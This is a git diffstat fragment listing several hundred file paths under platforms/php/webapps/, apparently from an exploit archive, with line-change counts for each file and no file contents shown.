platforms/php/webapps/4854.txt | 178 +- platforms/php/webapps/4855.txt | 62 +- platforms/php/webapps/4857.txt | 220 +- platforms/php/webapps/4858.pl | 334 +- platforms/php/webapps/4859.txt | 64 +- platforms/php/webapps/4860.pl | 268 +- platforms/php/webapps/4861.txt | 72 +- platforms/php/webapps/4863.pl | 266 +- platforms/php/webapps/4865.txt | 52 +- platforms/php/webapps/4867.pl | 86 +- platforms/php/webapps/4870.txt | 64 +- platforms/php/webapps/4871.php | 296 +- platforms/php/webapps/4872.txt | 66 +- platforms/php/webapps/4876.txt | 128 +- platforms/php/webapps/4879.php | 298 +- platforms/php/webapps/4880.php | 680 +- platforms/php/webapps/4882.txt | 64 +- platforms/php/webapps/4883.txt | 68 +- platforms/php/webapps/4884.php | 296 +- platforms/php/webapps/4886.pl | 176 +- platforms/php/webapps/4887.htm | 258 +- platforms/php/webapps/4888.txt | 82 +- platforms/php/webapps/4889.txt | 30 +- platforms/php/webapps/4890.txt | 72 +- platforms/php/webapps/4891.php | 336 +- platforms/php/webapps/4895.txt | 96 +- platforms/php/webapps/4896.pl | 70 +- platforms/php/webapps/4897.pl | 114 +- platforms/php/webapps/4898.txt | 52 +- platforms/php/webapps/4899.txt | 124 +- platforms/php/webapps/4901.txt | 74 +- platforms/php/webapps/4902.txt | 66 +- platforms/php/webapps/4904.txt | 150 +- platforms/php/webapps/4905.pl | 108 +- platforms/php/webapps/4907.py | 116 +- platforms/php/webapps/4908.pl | 128 +- platforms/php/webapps/4912.txt | 100 +- platforms/php/webapps/4916.txt | 38 +- platforms/php/webapps/4919.txt | 238 +- platforms/php/webapps/4920.txt | 112 +- platforms/php/webapps/4922.txt | 278 +- platforms/php/webapps/4924.php | 290 +- platforms/php/webapps/4925.txt | 42 +- platforms/php/webapps/4926.pl | 134 +- platforms/php/webapps/4927.php | 210 +- platforms/php/webapps/4928.txt | 218 +- platforms/php/webapps/4929.txt | 46 +- platforms/php/webapps/4930.txt | 36 +- platforms/php/webapps/4933.pl | 268 +- platforms/php/webapps/4936.txt | 24 +- platforms/php/webapps/4937.txt | 92 +- platforms/php/webapps/4939.txt | 46 +- platforms/php/webapps/4940.pl | 140 +- platforms/php/webapps/4943.txt | 58 +- platforms/php/webapps/4944.txt | 34 +- platforms/php/webapps/4945.txt | 212 +- platforms/php/webapps/4950.php | 240 +- platforms/php/webapps/4951.txt | 40 +- platforms/php/webapps/4952.txt | 70 +- platforms/php/webapps/4953.txt | 76 +- platforms/php/webapps/4954.txt | 56 +- platforms/php/webapps/4955.txt | 30 +- platforms/php/webapps/4956.txt | 68 +- platforms/php/webapps/4957.txt | 88 +- platforms/php/webapps/4958.txt | 98 +- platforms/php/webapps/4960.txt | 56 +- platforms/php/webapps/4961.php | 468 +- platforms/php/webapps/4962.pl | 642 +- platforms/php/webapps/4963.pl | 1184 +- platforms/php/webapps/4964.php | 126 +- platforms/php/webapps/4965.php | 288 +- platforms/php/webapps/4966.pl | 612 +- platforms/php/webapps/4968.txt | 46 +- platforms/php/webapps/4969.txt | 38 +- platforms/php/webapps/4973.txt | 36 +- platforms/php/webapps/4975.txt | 60 +- platforms/php/webapps/4976.txt | 36 +- platforms/php/webapps/4980.txt | 82 +- platforms/php/webapps/4984.txt | 30 +- platforms/php/webapps/4985.txt | 84 +- platforms/php/webapps/4989.txt | 156 +- platforms/php/webapps/4990.txt | 58 +- platforms/php/webapps/4991.txt | 48 +- platforms/php/webapps/4992.txt | 60 +- platforms/php/webapps/4993.txt | 70 +- platforms/php/webapps/5000.txt | 76 +- platforms/php/webapps/5001.txt | 40 +- platforms/php/webapps/5002.txt | 98 +- platforms/php/webapps/5003.txt | 41 +- platforms/php/webapps/5006.txt | 308 +- platforms/php/webapps/5007.txt | 64 +- platforms/php/webapps/5008.txt | 56 +- platforms/php/webapps/5009.txt | 56 +- platforms/php/webapps/5010.txt | 56 +- platforms/php/webapps/5011.txt | 110 +- platforms/php/webapps/5012.pl | 114 +- platforms/php/webapps/5013.php | 174 +- platforms/php/webapps/5014.txt | 52 +- platforms/php/webapps/5015.txt | 76 +- platforms/php/webapps/5016.txt | 74 +- platforms/php/webapps/5017.php | 192 +- platforms/php/webapps/5018.pl | 460 +- platforms/php/webapps/5019.txt | 268 +- platforms/php/webapps/5020.txt | 104 +- platforms/php/webapps/5021.txt | 50 +- platforms/php/webapps/5022.txt | 52 +- platforms/php/webapps/5026.txt | 196 +- platforms/php/webapps/5027.txt | 24 +- platforms/php/webapps/5029.txt | 78 +- platforms/php/webapps/5030.txt | 74 +- platforms/php/webapps/5031.txt | 74 +- platforms/php/webapps/5033.txt | 110 +- platforms/php/webapps/5034.txt | 80 +- platforms/php/webapps/5035.txt | 142 +- platforms/php/webapps/5037.txt | 66 +- platforms/php/webapps/5039.txt | 62 +- platforms/php/webapps/5040.txt | 64 +- platforms/php/webapps/5041.txt | 110 +- platforms/php/webapps/5042.txt | 254 +- platforms/php/webapps/5047.txt | 22 +- platforms/php/webapps/5053.txt | 58 +- platforms/php/webapps/5055.txt | 48 +- platforms/php/webapps/5056.txt | 38 +- platforms/php/webapps/5057.txt | 260 +- platforms/php/webapps/5058.txt | 100 +- platforms/php/webapps/5059.txt | 54 +- platforms/php/webapps/5060.txt | 104 +- platforms/php/webapps/5061.txt | 70 +- platforms/php/webapps/5062.txt | 74 +- platforms/php/webapps/5064.txt | 102 +- platforms/php/webapps/5065.txt | 74 +- platforms/php/webapps/5066.php | 196 +- platforms/php/webapps/5068.txt | 124 +- platforms/php/webapps/5070.pl | 304 +- platforms/php/webapps/5071.txt | 86 +- platforms/php/webapps/5072.txt | 34 +- platforms/php/webapps/5073.txt | 54 +- platforms/php/webapps/5074.php | 252 +- platforms/php/webapps/5075.txt | 52 +- platforms/php/webapps/5076.txt | 128 +- platforms/php/webapps/5080.txt | 58 +- platforms/php/webapps/5081.txt | 84 +- platforms/php/webapps/5082.txt | 176 +- platforms/php/webapps/5083.txt | 80 +- platforms/php/webapps/5084.txt | 62 +- platforms/php/webapps/5088.py | 256 +- platforms/php/webapps/5089.txt | 60 +- platforms/php/webapps/5090.pl | 96 +- platforms/php/webapps/5091.pl | 96 +- platforms/php/webapps/5094.txt | 74 +- platforms/php/webapps/5095.txt | 48 +- platforms/php/webapps/5096.txt | 48 +- platforms/php/webapps/5097.txt | 30 +- platforms/php/webapps/5098.txt | 20 +- platforms/php/webapps/5099.php | 132 +- platforms/php/webapps/5101.pl | 140 +- platforms/php/webapps/5103.txt | 80 +- platforms/php/webapps/5104.txt | 76 +- platforms/php/webapps/5105.pl | 232 +- platforms/php/webapps/5109.txt | 84 +- platforms/php/webapps/5115.txt | 46 +- platforms/php/webapps/5116.txt | 24 +- platforms/php/webapps/5117.txt | 108 +- platforms/php/webapps/5118.txt | 112 +- platforms/php/webapps/5119.txt | 106 +- platforms/php/webapps/5120.pl | 192 +- platforms/php/webapps/5121.txt | 104 +- platforms/php/webapps/5123.txt | 20 +- platforms/php/webapps/5124.txt | 72 +- platforms/php/webapps/5125.txt | 46 +- platforms/php/webapps/5126.txt | 80 +- platforms/php/webapps/5127.txt | 126 +- platforms/php/webapps/5128.txt | 72 +- platforms/php/webapps/5129.txt | 18 +- platforms/php/webapps/5130.txt | 292 +- platforms/php/webapps/5131.pl | 76 +- platforms/php/webapps/5132.txt | 78 +- platforms/php/webapps/5133.txt | 76 +- platforms/php/webapps/5134.txt | 56 +- platforms/php/webapps/5135.txt | 56 +- platforms/php/webapps/5136.txt | 114 +- platforms/php/webapps/5137.txt | 20 +- platforms/php/webapps/5138.txt | 108 +- platforms/php/webapps/5139.txt | 72 +- platforms/php/webapps/5140.txt | 22 +- platforms/php/webapps/5145.txt | 62 +- platforms/php/webapps/5146.txt | 58 +- platforms/php/webapps/5147.txt | 72 +- platforms/php/webapps/5148.txt | 58 +- platforms/php/webapps/5149.txt | 1412 +- platforms/php/webapps/5154.txt | 60 +- platforms/php/webapps/5155.txt | 46 +- platforms/php/webapps/5156.txt | 66 +- platforms/php/webapps/5157.txt | 66 +- platforms/php/webapps/5158.txt | 60 +- platforms/php/webapps/5159.txt | 44 +- platforms/php/webapps/5160.txt | 56 +- platforms/php/webapps/5161.txt | 44 +- platforms/php/webapps/5162.txt | 12 +- platforms/php/webapps/5163.txt | 46 +- platforms/php/webapps/5164.php | 340 +- platforms/php/webapps/5166.htm | 212 +- platforms/php/webapps/5168.txt | 44 +- platforms/php/webapps/5169.txt | 144 +- platforms/php/webapps/5170.txt | 42 +- platforms/php/webapps/5171.txt | 64 +- platforms/php/webapps/5172.txt | 86 +- platforms/php/webapps/5173.txt | 40 +- platforms/php/webapps/5174.txt | 42 +- platforms/php/webapps/5176.txt | 14 +- platforms/php/webapps/5177.txt | 76 +- platforms/php/webapps/5178.txt | 82 +- platforms/php/webapps/5179.txt | 56 +- platforms/php/webapps/5181.txt | 314 +- platforms/php/webapps/5182.txt | 24 +- platforms/php/webapps/5183.txt | 70 +- platforms/php/webapps/5186.txt | 94 +- platforms/php/webapps/5189.pl | 122 +- platforms/php/webapps/5192.pl | 230 +- platforms/php/webapps/5194.txt | 102 +- platforms/php/webapps/5195.txt | 48 +- platforms/php/webapps/5196.pl | 212 +- platforms/php/webapps/5198.txt | 42 +- platforms/php/webapps/5199.txt | 52 +- platforms/php/webapps/5200.txt | 50 +- platforms/php/webapps/5202.txt | 52 +- platforms/php/webapps/5203.txt | 32 +- platforms/php/webapps/5204.py | 80 +- platforms/php/webapps/5206.txt | 68 +- platforms/php/webapps/5207.txt | 32 +- platforms/php/webapps/5208.txt | 58 +- platforms/php/webapps/5209.txt | 38 +- platforms/php/webapps/5211.txt | 30 +- platforms/php/webapps/5214.txt | 94 +- platforms/php/webapps/5216.txt | 62 +- platforms/php/webapps/5218.txt | 60 +- platforms/php/webapps/5221.txt | 80 +- platforms/php/webapps/5222.txt | 86 +- platforms/php/webapps/5223.txt | 98 +- platforms/php/webapps/5226.txt | 50 +- platforms/php/webapps/5231.php | 108 +- platforms/php/webapps/5232.txt | 278 +- platforms/php/webapps/5234.txt | 68 +- platforms/php/webapps/5236.txt | 58 +- platforms/php/webapps/5237.txt | 84 +- platforms/php/webapps/5239.php | 348 +- platforms/php/webapps/5240.htm | 178 +- platforms/php/webapps/5241.txt | 62 +- platforms/php/webapps/5242.txt | 60 +- platforms/php/webapps/5243.txt | 52 +- platforms/php/webapps/5245.txt | 70 +- platforms/php/webapps/5246.txt | 80 +- platforms/php/webapps/5247.txt | 80 +- platforms/php/webapps/5256.pl | 284 +- platforms/php/webapps/5260.txt | 72 +- platforms/php/webapps/5262.txt | 80 +- platforms/php/webapps/5263.txt | 102 +- platforms/php/webapps/5265.txt | 34 +- platforms/php/webapps/5266.txt | 78 +- platforms/php/webapps/5267.txt | 66 +- platforms/php/webapps/5273.txt | 104 +- platforms/php/webapps/5275.txt | 46 +- platforms/php/webapps/5277.txt | 116 +- platforms/php/webapps/5278.txt | 122 +- platforms/php/webapps/5279.txt | 110 +- platforms/php/webapps/5280.txt | 110 +- platforms/php/webapps/5281.php | 1906 +-- platforms/php/webapps/5285.txt | 42 +- platforms/php/webapps/5286.txt | 74 +- platforms/php/webapps/5288.txt | 58 +- platforms/php/webapps/5290.txt | 84 +- platforms/php/webapps/5291.txt | 66 +- platforms/php/webapps/5293.pl | 82 +- platforms/php/webapps/5294.txt | 70 +- platforms/php/webapps/5295.pl | 104 +- platforms/php/webapps/5296.txt | 34 +- platforms/php/webapps/5297.txt | 72 +- platforms/php/webapps/5298.py | 96 +- platforms/php/webapps/5299.txt | 106 +- platforms/php/webapps/5300.txt | 98 +- platforms/php/webapps/5301.txt | 122 +- platforms/php/webapps/5302.txt | 130 +- platforms/php/webapps/5303.txt | 204 +- platforms/php/webapps/5305.py | 114 +- platforms/php/webapps/5308.txt | 110 +- platforms/php/webapps/5309.txt | 272 +- platforms/php/webapps/5310.txt | 98 +- platforms/php/webapps/5311.txt | 136 +- platforms/php/webapps/5312.txt | 90 +- platforms/php/webapps/5318.txt | 58 +- platforms/php/webapps/5319.pl | 302 +- platforms/php/webapps/5322.txt | 74 +- platforms/php/webapps/5323.pl | 110 +- platforms/php/webapps/5324.txt | 66 +- platforms/php/webapps/5325.txt | 114 +- platforms/php/webapps/5326.txt | 48 +- platforms/php/webapps/5328.txt | 40 +- platforms/php/webapps/5329.txt | 62 +- platforms/php/webapps/5331.pl | 240 +- platforms/php/webapps/5333.txt | 258 +- platforms/php/webapps/5335.txt | 96 +- platforms/php/webapps/5336.pl | 338 +- platforms/php/webapps/5337.txt | 82 +- platforms/php/webapps/5339.php | 2130 +-- platforms/php/webapps/5340.txt | 58 +- platforms/php/webapps/5345.txt | 70 +- platforms/php/webapps/5347.txt | 18 +- platforms/php/webapps/5348.txt | 22 +- platforms/php/webapps/5350.txt | 66 +- platforms/php/webapps/5351.txt | 84 +- platforms/php/webapps/5352.txt | 44 +- platforms/php/webapps/5353.txt | 46 +- platforms/php/webapps/5358.pl | 128 +- platforms/php/webapps/5359.txt | 63 +- platforms/php/webapps/5360.txt | 62 +- platforms/php/webapps/5362.txt | 80 +- platforms/php/webapps/5363.txt | 64 +- platforms/php/webapps/5364.txt | 68 +- platforms/php/webapps/5365.txt | 50 +- platforms/php/webapps/5367.pl | 152 +- platforms/php/webapps/5368.txt | 68 +- platforms/php/webapps/5369.txt | 22 +- platforms/php/webapps/5370.txt | 74 +- platforms/php/webapps/5371.txt | 70 +- platforms/php/webapps/5372.txt | 64 +- platforms/php/webapps/5374.txt | 80 +- platforms/php/webapps/5375.txt | 36 +- platforms/php/webapps/5377.txt | 82 +- platforms/php/webapps/5378.txt | 82 +- platforms/php/webapps/5379.txt | 58 +- platforms/php/webapps/5380.txt | 44 +- platforms/php/webapps/5381.txt | 58 +- platforms/php/webapps/5382.txt | 42 +- platforms/php/webapps/5383.txt | 90 +- platforms/php/webapps/5385.txt | 82 +- platforms/php/webapps/5387.txt | 104 +- platforms/php/webapps/5388.txt | 80 +- platforms/php/webapps/5389.txt | 76 +- platforms/php/webapps/5390.txt | 76 +- platforms/php/webapps/5391.php | 306 +- platforms/php/webapps/5392.php | 272 +- platforms/php/webapps/5393.txt | 74 +- platforms/php/webapps/5394.txt | 62 +- platforms/php/webapps/5399.txt | 32 +- platforms/php/webapps/5400.txt | 62 +- platforms/php/webapps/5401.txt | 76 +- platforms/php/webapps/5402.txt | 88 +- platforms/php/webapps/5404.php | 1486 +- platforms/php/webapps/5405.txt | 126 +- platforms/php/webapps/5406.txt | 36 +- platforms/php/webapps/5407.php | 228 +- platforms/php/webapps/5408.pl | 120 +- platforms/php/webapps/5410.txt | 62 +- platforms/php/webapps/5411.txt | 70 +- platforms/php/webapps/5412.txt | 72 +- platforms/php/webapps/5413.txt | 64 +- platforms/php/webapps/5414.txt | 64 +- platforms/php/webapps/5415.txt | 86 +- platforms/php/webapps/5418.pl | 66 +- platforms/php/webapps/5419.txt | 56 +- platforms/php/webapps/5421.txt | 116 +- platforms/php/webapps/5422.pl | 208 +- platforms/php/webapps/5423.txt | 62 +- platforms/php/webapps/5425.pl | 158 +- platforms/php/webapps/5426.txt | 88 +- platforms/php/webapps/5428.txt | 36 +- platforms/php/webapps/5429.txt | 82 +- platforms/php/webapps/5431.txt | 82 +- platforms/php/webapps/5432.txt | 46 +- platforms/php/webapps/5433.txt | 82 +- platforms/php/webapps/5434.pl | 290 +- platforms/php/webapps/5435.txt | 52 +- platforms/php/webapps/5436.txt | 58 +- platforms/php/webapps/5437.txt | 170 +- platforms/php/webapps/5439.txt | 84 +- platforms/php/webapps/5440.php | 142 +- platforms/php/webapps/5441.txt | 30 +- platforms/php/webapps/5443.txt | 30 +- platforms/php/webapps/5444.txt | 66 +- platforms/php/webapps/5446.txt | 24 +- platforms/php/webapps/5447.txt | 106 +- platforms/php/webapps/5448.txt | 62 +- platforms/php/webapps/5449.php | 1484 +- platforms/php/webapps/5450.txt | 50 +- platforms/php/webapps/5452.txt | 228 +- platforms/php/webapps/5454.txt | 30 +- platforms/php/webapps/5457.txt | 32 +- platforms/php/webapps/5459.txt | 52 +- platforms/php/webapps/5463.txt | 66 +- platforms/php/webapps/5464.txt | 34 +- platforms/php/webapps/5466.pl | 110 +- platforms/php/webapps/5467.txt | 86 +- platforms/php/webapps/5468.txt | 84 +- platforms/php/webapps/5469.txt | 54 +- platforms/php/webapps/5470.py | 318 +- platforms/php/webapps/5471.txt | 50 +- platforms/php/webapps/5473.pl | 86 +- platforms/php/webapps/5474.txt | 38 +- platforms/php/webapps/5476.txt | 42 +- platforms/php/webapps/5477.txt | 38 +- platforms/php/webapps/5478.txt | 166 +- platforms/php/webapps/5480.txt | 44 +- platforms/php/webapps/5481.txt | 120 +- platforms/php/webapps/5483.txt | 66 +- platforms/php/webapps/5484.txt | 60 +- platforms/php/webapps/5486.txt | 46 +- platforms/php/webapps/5487.txt | 46 +- platforms/php/webapps/5488.txt | 78 +- platforms/php/webapps/5490.pl | 760 +- platforms/php/webapps/5493.txt | 82 +- platforms/php/webapps/5494.txt | 164 +- platforms/php/webapps/5495.txt | 28 +- platforms/php/webapps/5497.txt | 70 +- platforms/php/webapps/5499.txt | 78 +- platforms/php/webapps/5500.txt | 110 +- platforms/php/webapps/5501.txt | 74 +- platforms/php/webapps/5502.pl | 76 +- platforms/php/webapps/5504.txt | 42 +- platforms/php/webapps/5505.txt | 38 +- platforms/php/webapps/5508.txt | 32 +- platforms/php/webapps/5509.txt | 40 +- platforms/php/webapps/5510.txt | 66 +- platforms/php/webapps/5512.pl | 674 +- platforms/php/webapps/5514.pl | 70 +- platforms/php/webapps/5516.txt | 170 +- platforms/php/webapps/5517.txt | 176 +- platforms/php/webapps/5520.txt | 76 +- platforms/php/webapps/5521.txt | 122 +- platforms/php/webapps/5522.txt | 32 +- platforms/php/webapps/5523.txt | 28 +- platforms/php/webapps/5524.txt | 64 +- platforms/php/webapps/5525.txt | 58 +- platforms/php/webapps/5526.txt | 74 +- platforms/php/webapps/5527.pl | 672 +- platforms/php/webapps/5528.txt | 48 +- platforms/php/webapps/5529.txt | 56 +- platforms/php/webapps/5531.txt | 116 +- platforms/php/webapps/5532.txt | 84 +- platforms/php/webapps/5533.txt | 28 +- platforms/php/webapps/5535.txt | 40 +- platforms/php/webapps/5537.txt | 126 +- platforms/php/webapps/5538.txt | 212 +- platforms/php/webapps/5539.txt | 74 +- platforms/php/webapps/5540.pl | 78 +- platforms/php/webapps/5541.txt | 178 +- platforms/php/webapps/5542.txt | 174 +- platforms/php/webapps/5543.txt | 178 +- platforms/php/webapps/5544.txt | 184 +- platforms/php/webapps/5545.txt | 178 +- platforms/php/webapps/5546.txt | 176 +- platforms/php/webapps/5548.txt | 72 +- platforms/php/webapps/5549.txt | 106 +- platforms/php/webapps/5550.php | 508 +- platforms/php/webapps/5551.txt | 86 +- platforms/php/webapps/5552.txt | 70 +- platforms/php/webapps/5554.php | 74 +- platforms/php/webapps/5555.txt | 74 +- platforms/php/webapps/5557.pl | 144 +- platforms/php/webapps/5558.txt | 70 +- platforms/php/webapps/5559.txt | 72 +- platforms/php/webapps/5560.txt | 82 +- platforms/php/webapps/5562.py | 299 +- platforms/php/webapps/5565.pl | 86 +- platforms/php/webapps/5566.txt | 74 +- platforms/php/webapps/5567.txt | 66 +- platforms/php/webapps/5568.txt | 32 +- platforms/php/webapps/5575.txt | 80 +- platforms/php/webapps/5576.pl | 84 +- platforms/php/webapps/5577.txt | 56 +- platforms/php/webapps/5578.txt | 288 +- platforms/php/webapps/5579.htm | 40 +- platforms/php/webapps/5580.txt | 78 +- platforms/php/webapps/5581.txt | 36 +- platforms/php/webapps/5582.txt | 145 +- platforms/php/webapps/5587.pl | 142 +- platforms/php/webapps/5588.php | 134 +- platforms/php/webapps/5589.php | 140 +- platforms/php/webapps/5590.txt | 102 +- platforms/php/webapps/5592.txt | 104 +- platforms/php/webapps/5594.txt | 98 +- platforms/php/webapps/5595.txt | 122 +- platforms/php/webapps/5596.txt | 104 +- platforms/php/webapps/5597.pl | 318 +- platforms/php/webapps/5598.txt | 72 +- platforms/php/webapps/5599.txt | 136 +- platforms/php/webapps/5600.php | 314 +- platforms/php/webapps/5601.pl | 180 +- platforms/php/webapps/5602.txt | 130 +- platforms/php/webapps/5603.txt | 76 +- platforms/php/webapps/5604.txt | 50 +- platforms/php/webapps/5605.txt | 42 +- platforms/php/webapps/5606.txt | 66 +- platforms/php/webapps/5607.txt | 42 +- platforms/php/webapps/5609.txt | 98 +- platforms/php/webapps/561.sh | 6 +- platforms/php/webapps/5610.txt | 62 +- platforms/php/webapps/5611.txt | 92 +- platforms/php/webapps/5613.txt | 102 +- platforms/php/webapps/5614.txt | 104 +- platforms/php/webapps/5615.txt | 108 +- platforms/php/webapps/5616.txt | 106 +- platforms/php/webapps/5617.txt | 108 +- platforms/php/webapps/5620.txt | 106 +- platforms/php/webapps/5621.txt | 88 +- platforms/php/webapps/5623.txt | 76 +- platforms/php/webapps/5624.txt | 44 +- platforms/php/webapps/5626.txt | 86 +- platforms/php/webapps/5627.pl | 54 +- platforms/php/webapps/5628.txt | 170 +- platforms/php/webapps/5630.txt | 114 +- platforms/php/webapps/5631.txt | 22 +- platforms/php/webapps/5634.htm | 98 +- platforms/php/webapps/5635.pl | 152 +- platforms/php/webapps/5636.txt | 24 +- platforms/php/webapps/5637.txt | 38 +- platforms/php/webapps/5638.txt | 106 +- platforms/php/webapps/5639.pl | 1036 +- platforms/php/webapps/5640.py | 192 +- platforms/php/webapps/5641.txt | 60 +- platforms/php/webapps/5642.txt | 72 +- platforms/php/webapps/5643.txt | 60 +- platforms/php/webapps/5644.txt | 248 +- platforms/php/webapps/5645.txt | 126 +- platforms/php/webapps/5646.txt | 134 +- platforms/php/webapps/5647.txt | 120 +- platforms/php/webapps/5648.pl | 70 +- platforms/php/webapps/5649.pl | 66 +- platforms/php/webapps/565.txt | 6 +- platforms/php/webapps/5650.pl | 66 +- platforms/php/webapps/5651.txt | 40 +- platforms/php/webapps/5652.pl | 154 +- platforms/php/webapps/5653.php | 444 +- platforms/php/webapps/5654.txt | 92 +- platforms/php/webapps/5655.pl | 264 +- platforms/php/webapps/5656.txt | 118 +- platforms/php/webapps/5657.txt | 438 +- platforms/php/webapps/5658.txt | 62 +- platforms/php/webapps/5659.txt | 26 +- platforms/php/webapps/5660.txt | 130 +- platforms/php/webapps/5661.txt | 74 +- platforms/php/webapps/5663.txt | 72 +- platforms/php/webapps/5666.txt | 88 +- platforms/php/webapps/5668.txt | 262 +- platforms/php/webapps/5669.txt | 120 +- platforms/php/webapps/5670.txt | 26 +- platforms/php/webapps/5671.txt | 70 +- platforms/php/webapps/5672.txt | 20 +- platforms/php/webapps/5673.txt | 68 +- platforms/php/webapps/5674.txt | 128 +- platforms/php/webapps/5675.txt | 94 +- platforms/php/webapps/5676.txt | 52 +- platforms/php/webapps/5677.txt | 223 +- platforms/php/webapps/5678.txt | 40 +- platforms/php/webapps/5680.txt | 32 +- platforms/php/webapps/5683.txt | 46 +- platforms/php/webapps/5685.txt | 54 +- platforms/php/webapps/5689.txt | 68 +- platforms/php/webapps/5690.txt | 62 +- platforms/php/webapps/5692.pl | 128 +- platforms/php/webapps/5693.txt | 60 +- platforms/php/webapps/5698.txt | 184 +- platforms/php/webapps/5699.txt | 200 +- platforms/php/webapps/570.txt | 6 +- platforms/php/webapps/5700.htm | 54 +- platforms/php/webapps/5701.txt | 94 +- platforms/php/webapps/5702.txt | 78 +- platforms/php/webapps/5703.txt | 56 +- platforms/php/webapps/5704.txt | 20 +- platforms/php/webapps/5706.php | 110 +- platforms/php/webapps/5707.txt | 84 +- platforms/php/webapps/5708.txt | 44 +- platforms/php/webapps/5710.pl | 158 +- platforms/php/webapps/5713.txt | 61 +- platforms/php/webapps/5715.txt | 26 +- platforms/php/webapps/5716.txt | 128 +- platforms/php/webapps/5721.pl | 222 +- platforms/php/webapps/5722.txt | 64 +- platforms/php/webapps/5723.txt | 40 +- platforms/php/webapps/5724.txt | 30 +- platforms/php/webapps/5725.txt | 130 +- platforms/php/webapps/5728.txt | 30 +- platforms/php/webapps/5729.txt | 64 +- platforms/php/webapps/5730.txt | 60 +- platforms/php/webapps/5731.txt | 72 +- platforms/php/webapps/5733.txt | 368 +- platforms/php/webapps/5736.txt | 124 +- platforms/php/webapps/5737.pl | 218 +- platforms/php/webapps/5739.txt | 162 +- platforms/php/webapps/574.txt | 6 +- platforms/php/webapps/5740.pl | 86 +- platforms/php/webapps/5742.txt | 157 +- platforms/php/webapps/5744.txt | 42 +- platforms/php/webapps/5745.txt | 114 +- platforms/php/webapps/5748.txt | 42 +- platforms/php/webapps/5752.pl | 28 +- platforms/php/webapps/5754.txt | 148 +- platforms/php/webapps/5756.txt | 53 +- platforms/php/webapps/5757.txt | 38 +- platforms/php/webapps/5758.txt | 262 +- platforms/php/webapps/5759.txt | 42 +- platforms/php/webapps/5760.pl | 148 +- platforms/php/webapps/5761.pl | 158 +- platforms/php/webapps/5764.txt | 140 +- platforms/php/webapps/5766.txt | 150 +- platforms/php/webapps/5767.php | 304 +- platforms/php/webapps/5768.txt | 26 +- platforms/php/webapps/5769.pl | 100 +- platforms/php/webapps/5771.txt | 88 +- platforms/php/webapps/5772.txt | 86 +- platforms/php/webapps/5773.txt | 150 +- platforms/php/webapps/5774.txt | 94 +- platforms/php/webapps/5776.txt | 110 +- platforms/php/webapps/5779.txt | 154 +- platforms/php/webapps/5782.txt | 104 +- platforms/php/webapps/5783.txt | 74 +- platforms/php/webapps/5784.txt | 134 +- platforms/php/webapps/5785.txt | 96 +- platforms/php/webapps/5786.txt | 153 +- platforms/php/webapps/5787.txt | 120 +- platforms/php/webapps/5788.txt | 134 +- platforms/php/webapps/5789.pl | 334 +- platforms/php/webapps/5791.txt | 133 +- platforms/php/webapps/5792.txt | 134 +- platforms/php/webapps/5794.pl | 206 +- platforms/php/webapps/5797.txt | 144 +- platforms/php/webapps/5798.pl | 210 +- platforms/php/webapps/5799.pl | 126 +- platforms/php/webapps/5800.pl | 74 +- platforms/php/webapps/5801.txt | 50 +- platforms/php/webapps/5802.txt | 62 +- platforms/php/webapps/5803.txt | 176 +- platforms/php/webapps/5804.txt | 176 +- platforms/php/webapps/5806.pl | 298 +- platforms/php/webapps/5807.txt | 64 +- platforms/php/webapps/5809.txt | 64 +- platforms/php/webapps/5810.txt | 134 +- platforms/php/webapps/5811.txt | 102 +- platforms/php/webapps/5812.txt | 70 +- platforms/php/webapps/5813.txt | 126 +- platforms/php/webapps/5815.pl | 284 +- platforms/php/webapps/5818.txt | 110 +- platforms/php/webapps/5819.txt | 140 +- platforms/php/webapps/5820.txt | 116 +- platforms/php/webapps/5821.txt | 112 +- platforms/php/webapps/5822.txt | 170 +- platforms/php/webapps/5823.txt | 114 +- platforms/php/webapps/5824.txt | 152 +- platforms/php/webapps/5826.py | 362 +- platforms/php/webapps/5828.txt | 68 +- platforms/php/webapps/5829.txt | 68 +- platforms/php/webapps/5830.txt | 132 +- platforms/php/webapps/5831.txt | 142 +- platforms/php/webapps/5832.pl | 298 +- platforms/php/webapps/5833.txt | 56 +- platforms/php/webapps/5835.txt | 98 +- platforms/php/webapps/5836.txt | 94 +- platforms/php/webapps/5838.txt | 98 +- platforms/php/webapps/5839.txt | 60 +- platforms/php/webapps/5840.txt | 72 +- platforms/php/webapps/5841.txt | 118 +- platforms/php/webapps/5842.txt | 112 +- platforms/php/webapps/5845.txt | 28 +- platforms/php/webapps/5846.txt | 114 +- platforms/php/webapps/5847.txt | 30 +- platforms/php/webapps/5848.txt | 162 +- platforms/php/webapps/5850.txt | 36 +- platforms/php/webapps/5852.txt | 96 +- platforms/php/webapps/5853.txt | 48 +- platforms/php/webapps/5854.txt | 50 +- platforms/php/webapps/5855.txt | 108 +- platforms/php/webapps/5856.txt | 190 +- platforms/php/webapps/5857.txt | 28 +- platforms/php/webapps/5858.txt | 20 +- platforms/php/webapps/5859.txt | 172 +- platforms/php/webapps/5860.txt | 210 +- platforms/php/webapps/5861.txt | 190 +- platforms/php/webapps/5862.txt | 60 +- platforms/php/webapps/5863.txt | 60 +- platforms/php/webapps/5864.txt | 76 +- platforms/php/webapps/5865.txt | 204 +- platforms/php/webapps/5866.txt | 78 +- platforms/php/webapps/5869.txt | 212 +- platforms/php/webapps/5870.txt | 134 +- platforms/php/webapps/5871.txt | 56 +- platforms/php/webapps/5872.txt | 62 +- platforms/php/webapps/5873.txt | 106 +- platforms/php/webapps/5874.txt | 72 +- platforms/php/webapps/5875.txt | 100 +- platforms/php/webapps/5876.txt | 36 +- platforms/php/webapps/5877.txt | 162 +- platforms/php/webapps/5878.txt | 38 +- platforms/php/webapps/5879.txt | 112 +- platforms/php/webapps/5880.txt | 120 +- platforms/php/webapps/5881.txt | 96 +- platforms/php/webapps/5882.txt | 58 +- platforms/php/webapps/5883.txt | 82 +- platforms/php/webapps/5886.pl | 74 +- platforms/php/webapps/5887.pl | 94 +- platforms/php/webapps/5888.txt | 182 +- platforms/php/webapps/5889.txt | 116 +- platforms/php/webapps/5890.txt | 118 +- platforms/php/webapps/5892.txt | 98 +- platforms/php/webapps/5893.txt | 42 +- platforms/php/webapps/5895.txt | 106 +- platforms/php/webapps/5896.txt | 166 +- platforms/php/webapps/5898.pl | 432 +- platforms/php/webapps/5899.txt | 124 +- platforms/php/webapps/5900.txt | 48 +- platforms/php/webapps/5908.txt | 18 +- platforms/php/webapps/5909.pl | 128 +- platforms/php/webapps/5910.txt | 98 +- platforms/php/webapps/5911.txt | 76 +- platforms/php/webapps/5913.txt | 134 +- platforms/php/webapps/5914.txt | 134 +- platforms/php/webapps/5915.txt | 58 +- platforms/php/webapps/5924.txt | 200 +- 